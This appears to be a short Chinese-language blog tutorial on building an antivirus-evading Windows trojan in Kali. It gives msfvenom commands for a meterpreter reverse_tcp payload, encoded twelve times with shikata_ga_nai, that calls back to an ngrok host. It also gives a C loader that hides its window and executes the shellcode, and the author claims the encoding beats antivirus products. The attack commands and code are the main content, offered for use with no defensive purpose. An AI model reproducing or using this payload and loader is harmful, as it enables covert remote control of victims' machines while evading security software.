Kali下制作免杀payload

摘要

在kali中用msfvenom生成一个payloadmsfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘/x00’ lhost=local_ip lport=ip_port -f c

在kali中用msfvenom生成一个payload

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘/x00’ lhost=local_ip lport=ip_port -f c

上面命令中,-p选择指定payload,–e选择制定编码器(不同编码器免杀效果也有不同,部分编码器应对火绒等杀软效果显著), -i 编码次数,-b 去多余/坏字符,lhost是你申请的ngrok服务器地址 lport是自定义的远程端口,-f 生成指定格式。

我这里选择生成基于C语言的数组,当然你也可以用以下命令直接得到exe木马,但这样免杀效果会打折扣,经笔者测试多次,重复编码12次后免杀效果非常强大!

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘/x00’lhost=server.ngrok.cc lport=11206 -f exe > haya.exe

在win7下用VC6.0对下面代码进行编译,得到木马。

#include <stdio.h>

#pragmacomment( linker, “/subsystem:/”windows/” /entry:/”mainCRTStartup/””)//运行时不显示窗口

unsignedchar buf[] =

“buf数组”;//将复制的数组粘贴到此处

main()

{

((void(*)(void))&buf)();

}

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: